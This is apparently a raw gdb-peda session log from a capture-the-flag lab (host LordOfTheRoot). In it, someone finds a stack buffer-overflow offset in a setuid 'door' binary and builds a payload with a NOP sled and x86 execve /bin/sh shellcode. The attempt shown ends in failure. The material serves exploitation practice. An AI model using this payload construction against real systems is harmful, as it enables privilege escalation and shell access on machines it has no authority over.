'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%yA%zAs%AssAsBAs$AsnAsCAs-As(AsDAs;As)AsEAsaAs0AsFAsbAs1AsGAscAs2AsHAsdAs3AsIAseAs4AsJAsfAs5AsKAsgAs6A'
gdb-peda$
gdb-peda$ pset arg 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%yA%zAs%AssAsBAs$AsnAsCAs-As(AsDAs;As)AsEAsaAs0AsFAsbAs1AsGAscAs2AsHAsdAs3AsIAseAs4AsJAsfAs5AsKAsgAs6A'
gdb-peda$
gdb-peda$ pshow arg
arg[1]: AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%yA%zAs%AssAsBAs$AsnAsCAs-As(AsDAs;As)AsEAsaAs0AsFAsbAs1AsGAscAs2AsHAsdAs3AsIAseAs4AsJAsfAs5AsKAsgAs6A
gdb-peda$
gdb-peda$ run
Starting program: /SECRET/door2/file 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%yA%zAs%AssAsBAs$AsnAsCAs-As(AsDAs;As)AsEAsaAs0AsFAsbAs1AsGAscAs2AsHAsdAs3AsIAseAs4AsJAsfAs5AsKAsgAs6A'
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x0
EBX: 0x401e6000 --> 0x1a9da8
ECX: 0xbfc758b0 ("sKAsgAs6A")
EDX: 0xbfc73adc ("sKAsgAs6A")
ESI: 0x0
EDI: 0x0
EBP: 0x41415641 ('AVAA')
ESP: 0xbfc739a0 ("AAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%"...)
EIP: 0x57414174 --> 0x0
EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x5741416e: add BYTE PTR [eax],al
0x57414170: add BYTE PTR [eax],al
0x57414172: add BYTE PTR [eax],al
=> 0x57414174: add BYTE PTR [eax],al
0x57414176: add BYTE PTR [eax],al
0x57414178: add BYTE PTR [eax],al
0x5741417a: add BYTE PTR [eax],al
0x5741417c: add BYTE PTR [eax],al
[------------------------------------stack-------------------------------------]
0000| 0xbfc739a0 ("AAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%"...)
0004| 0xbfc739a4 ("AXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%u"...)
0008| 0xbfc739a8 ("vAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA"...)
0012| 0xbfc739ac ("AAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%"...)
0016| 0xbfc739b0 ("AZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%w"...)
0020| 0xbfc739b4 ("xAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA"...)
0024| 0xbfc739b8 ("AAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%"...)
0028| 0xbfc739bc ("%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x57414174 in ?? ()
gdb-peda$
gdb-peda$ pattern_search
Registers contain pattern buffer:
EIP+0 found at offset: 171
EBP+0 found at offset: 167
Registers point to pattern buffer:
[ESP] --> offset 175 - size ~203
[ECX] --> offset 491 - size ~9
[EDX] --> offset 491 - size ~9
Search a cyclic pattern in registers and memory
Set "pattern" option for basic/extended pattern type
Usage:
pattern_search
gdb-peda$
offset 171
smeagol@LordOfTheRoot:/SECRET$ gdb -q --args door2/file $(python -c 'print "A"*171 + "B"*4 + "\x90"*8 + "C"*(500-171-4-8)')
Reading symbols from door2/file...(no debugging symbols found)...done.
gdb-peda$ run
Starting program: /SECRET/door2/file AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB��������CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x0
EBX: 0x401e6000 --> 0x1a9da8
ECX: 0xbf8f18b0 ("CCCCCCCCC")
EDX: 0xbf8f0f4c ("CCCCCCCCC")
ESI: 0x0
EDI: 0x0
EBP: 0x41414141 ('AAAA')
ESP: 0xbf8f0e10 --> 0x90909090
EIP: 0x42424242 ('BBBB')
EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x42424242
[------------------------------------stack-------------------------------------]
0000| 0xbf8f0e10 --> 0x90909090
0004| 0xbf8f0e14 --> 0x90909090
0008| 0xbf8f0e18 ('C' <repeats 200 times>...)
0012| 0xbf8f0e1c ('C' <repeats 200 times>...)
0016| 0xbf8f0e20 ('C' <repeats 200 times>...)
0020| 0xbf8f0e24 ('C' <repeats 200 times>...)
0024| 0xbf8f0e28 ('C' <repeats 200 times>...)
0028| 0xbf8f0e2c ('C' <repeats 200 times>...)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x42424242 in ?? ()
gdb-peda$
gdb-peda$ shellcode generate x86/linux exec
# x86/linux/exec: 24 bytes
shellcode = (
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31"
"\xc9\x89\xca\x6a\x0b\x58\xcd\x80"
)
gdb-peda$
smeagol@LordOfTheRoot:/SECRET$ for i in 1 2 3 ; do echo $i; ./door$i/file $(python -c 'print "A" * 175'); done
1
Segmentation fault (core dumped)
2
3
smeagol@LordOfTheRoot:/SECRET$ gdb -q --args door1/file $(python -c 'print "A"*171 + "B"*4 + "\x90"*16 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80" + "C"*(500-171-4-8-24)')
Reading symbols from door1/file...(no debugging symbols found)...done.
gdb-peda$ run
Starting program: /SECRET/door1/file AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB����������������1�Ph//shh/bin��1ɉ�j
XCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x0
EBX: 0x401e6000 --> 0x1a9da8
ECX: 0xbfeb08b0 ("CCCCCCCCC")
EDX: 0xbfeae9f4 ("CCCCCCCCC")
ESI: 0x0
EDI: 0x0
EBP: 0x41414141 ('AAAA')
ESP: 0xbfeae8b0 --> 0x90909090
EIP: 0x42424242 ('BBBB')
EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x42424242
[------------------------------------stack-------------------------------------]
0000| 0xbfeae8b0 --> 0x90909090
0004| 0xbfeae8b4 --> 0x90909090
0008| 0xbfeae8b8 --> 0x90909090
0012| 0xbfeae8bc --> 0x90909090
0016| 0xbfeae8c0 --> 0x6850c031
0020| 0xbfeae8c4 ("//shh/bin\211\343\061ɉ\312j\vX", 'C' <repeats 180 times>...)
0024| 0xbfeae8c8 ("h/bin\211\343\061ɉ\312j\vX", 'C' <repeats 184 times>...)
0028| 0xbfeae8cc --> 0x31e3896e
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x42424242 in ?? ()
gdb-peda$
실패 실패 실패
728x90